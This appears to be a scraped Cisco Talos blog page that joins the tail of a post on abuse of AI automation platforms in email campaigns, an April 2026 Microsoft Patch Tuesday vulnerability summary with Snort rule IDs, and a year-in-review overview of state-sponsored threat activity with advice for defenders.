Because several AI automation platforms exist today that are inherently designed to be flexible and trustworthy, the security community must move beyond simple static analysis to effectively counter their abuse. For instance, instead of blocking entire domains, which would disrupt legitimate business workflows, security researchers should investigate behavioral detection approaches. These should trigger alerts when high volumes of traffic are directed toward such platforms from unexpected internal sources. Similarly, if an endpoint attempts to communicate with an AI automation platform’s domain (e.g., “n8n.cloud”) that is not part of the organization’s authorized workflow, it should trigger an immediate alert.
Collaborative intelligence sharing is another effective approach to countering malicious email campaigns. Security teams should prioritize sharing indicators of compromise (IOCs) — such as specific webhook URL structures, malicious file hashes, and command and control (C2) domains — with platforms like Cisco Talos Intelligence.
Last but not least, safeguarding against these complex threats necessitates a comprehensive email security solution that utilizes AI-driven detection. Secure Email Threat Defense employs distinctive deep learning and machine learning models, incorporating Natural Language Processing, within its sophisticated threat detection systems. It detects harmful techniques employed in attacks against your organization, extracts unmatched context for particular business risks, offers searchable threat data, and classifies threats to identify which sectors of your organization are most at risk of attack. You can register now for a free trial of Email Threat Defense.
IOCs
IOCs for this threat also available on our GitHub repository here.
Microsoft has released its monthly security update for April 2026, which includes 165 vulnerabilities affecting a wide range of products, including eight Microsoft marked as “critical.” CVE-2026-23666 is a critical Denial of Service (DoS) vulnerability that affects the .NET framework. Successful exploitation could allow the attacker to deny service over the network.CVE-2026-32157 is a critical use after free vulnerability in the Remote Desktop Client that results in code execution. Attack requir
Microsoft has released its monthly security update for April 2026, which includes 165 vulnerabilities affecting a wide range of products, including eight Microsoft marked as “critical.”
CVE-2026-23666 is a critical Denial of Service (DoS) vulnerability that affects the .NET framework. Successful exploitation could allow the attacker to deny service over the network.
CVE-2026-32157 is a critical use after free vulnerability in the Remote Desktop Client that results in code execution. Attack requires an authorized user on the client to connect to a malicious server, which could result in code execution on the client.
CVE-2026-32190 is a critical user after free vulnerability in Microsoft Office that can result in local code execution. Attacker is remote but attack is carried out locally. Code from the local machine needs to be executed to exploit the vulnerability.
CVE-2026-33114 is a critical untrusted pointer deference vulnerability in Microsoft Office Word that could allow the attacker to execute code locally. Code from the local machine needs to be executed to exploit this vulnerability.
CVE-2026-33115 is a critical use after free vulnerability in Microsoft Office word that can result in local code execution. Similar to CVE-2026-33114 and CVE-2026-32190 the attacker is remote, but code needs to be executed from the local machine to exploit the vulnerability.
CVE-2026-33824 is a critical double free vulnerability in the Widows Internet Key Exchange (IKE) extension, allowing remote code execution. An unauthenticated attacker can send specially crafted packets to a Windows machine with IKE version 2 enabled to potentially enable remote code execution. Additional mitigations can include blocking inbound traffic on UDP ports 500 and 4500 if IKE is not in use.
CVE-2026-33826 is a critical improper input validation in Windows Active Directory that can result in code execution over an adjacent network. Requires an authenticated attacker to send specially crafted RPC calls to an RPC host. Can result in remote code execution. Note that successful exploitation requires the attacker be in the same restricted Active Directory domain as the target system.
CVE-2026-33827 is a critical race condition vulnerability in Windows TCP/IP that can result in remote code execution. Successful exploitation requires the attacker to win a race condition along with additional actions prior to exploitation to prepare the target environment. An unauthenticated actor can send specially crafted IPv6 packets to a Windows node where IPSec is enabled to potentially achieve remote code execution.
CVE-2026-32201 is an important improper input validation vulnerability in Microsoft Office SharePoint that can allow an unauthorized user to perform spoofing. An attacker that successfully exploits this vulnerability could view some sensitive information and make changes to disclosed information. This vulnerability has already been detected as being exploited in the wild.
The majority of the remaining vulnerabilities are labeled as important with a two moderate and one low vulnerability also being patched. Talos would like to highlight the several additional important vulnerabilities that Microsoft has deemed as “more likely” to be exploited.
· CVE-2026-32225 - Windows Shell Security Feature Bypass Vulnerability
· CVE-2026-33825 - Microsoft Defender Elevation of Privilege Vulnerability
A complete list of all other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are: 1:65902-1:65903, 1:66242-1:66251, 1:66259-1:66260, 1:66264-1:66267, 1:66275-1:66276
The following Snort 3 rules are also available: 1:301398, 1:301468-1:3101472, 1:301475, 1:301477-1:301478, 1:301480
Across the Talos 2025 Year in Review, state-sponsored threat activity from China, Russia, North Korea, and Iran all had varying motivations, such as espionage, disruption, financial gain, and geopolitical influence.But when you look at how these operations actually unfold, similar tactics, techniques, and procedures (TTPs) keep appearing: access through vulnerabilities and identity, and access that remains under the radar for a considerable period of time.Here are the dominant themes from the st
Across the Talos 2025 Year in Review, state-sponsored threat activity from China, Russia, North Korea, and Iran all had varying motivations, such as espionage, disruption, financial gain, and geopolitical influence.
But when you look at how these operations actually unfold, similar tactics, techniques, and procedures (TTPs) keep appearing: access through vulnerabilities and identity, and access that remains under the radar for a considerable period of time.
Here are the dominant themes from the state-sponsored section of the Talos Year in Review, available now.
China
China-nexus threat activity stood out this year for both volume and efficiency, with Talos investigations increasing by nearly 75% compared to 2024.
Newly disclosed vulnerabilities were exploited almost immediately (e.g., ToolShell), sometimes before patches were widely available. At the same time, long-standing, unpatched vulnerabilities in networking devices and widely used software continued to provide reliable entry points for these types of adversary.
Once inside, the focus shifts to persistence. Web shells, custom backdoors, tunneling tools, and credential harvesting all support long-term access.
There’s also more overlap than ever before between state-sponsored and financially motivated activity. It is likely that in some cases, state-sponsored actors conducted operations for personal profit alongside espionage-focused missions, while in others, cybercriminals collected valuable information during an attack that could be sold to espionage-motivated actors for further exploitation, providing them dual revenue streams.
Russia
Russian-linked cyber activity remains closely tied to their geopolitical objectives, particularly the war in Ukraine.
Many operations continue to rely on unpatched, older vulnerabilities (especially in networking devices) to gain initial access. These flaws provide a dependable way in for adversaries and support long-term intelligence gathering.
Russia’s offensive cyber activity is highly correlated with developments in the larger geopolitical sphere. For example, the announcement of sanctions intended to apply pressure on Russia by both the U.S. and E.U. often corresponded with our observed levels of Russian cyber activity.
Common malware families like Dark Crystal RAT (DCRAT), Remcos RAT, and Smoke Loader appeared frequently in Talos investigations on operations against Ukraine in 2025. These families aren’t exclusive to Russia-nexus threat actors, but they continue to be effective in environments where patching and visibility are inconsistent, and should therefore be high priority targets for defense and monitoring.
North Korea
North Korea cyber operations leaned heavily into social engineering and insider access in 2025. These operations were both for financial and espionage purposes.
Campaigns like Contagious Interview (orchestrated by Famous Chollima) used fake recruiters from legitimate companies to socially engineering targets to execute code or hand over credentials. From there, actors stole cryptocurrency, exfiltrated data, and established persistent access.
North Korean cyber actors also pulled off the largest cryptocurrency heist in history in 2025, stealing $1.5 billion. Additionally, thousands of IT workers used stolen identities and AI-generated profiles to secure positions at Fortune 500 companies, generating billions in annual revenue for North Korea’s nuclear weapons and ballistic missiles programs.
Iran
Iranian cyber threat activity in 2025 combined visible disruption with long-term access.
Hacktivist operations increased by 60% in response to geopolitical events, particularly the Israel-Hamas conflict. These campaigns, which include distributed denial-of-service (DDoS) attacks, defacements, and other disruptive operations, are often designed to generate attention and shape narratives.
At the same time, more traditional advanced persistent threat (APT) activity focused on persistence. Groups such as ShroudedSnooper targeted sectors like telecommunications, using custom compact backdoors designed to blend into normal traffic and remain undetected.
ShroudedSnooper is an APT that public reporting widely attributes to Iran’s Ministry of Intelligence and Security (MOIS). It is very likely an initial access group that passes operations off to secondary threat actors for long term espionage or destructive attacks.
For current threat intelligence related to the developing conflict in Iran, follow our coverage on the Talos blog.
Guidance for defenders
Though the state-sponsored activity that we tracked for the Talos Year in Review have different objectives, they still have the same reliance on gaining and maintaining access. The following guidance is recommended for security teams:
Don’t ignore older systems: Both newly disclosed and long-known vulnerabilities are actively exploited.
Prioritize identity security: Credentialed access and social engineering remain reliable entry points.
Increase visibility into network and edge infrastructure: These systems are common targets for persistent access.
Expect activity to follow global events: Sanctions, conflicts, and political developments often correlate with spikes in activity. Follow the Talos blog to keep informed of new state sponsored activity and campaigns.
Inspect for long-term presence: Many state-sponsored operations are designed to persist stealthily over time, not trigger immediate disruption.
Entrar
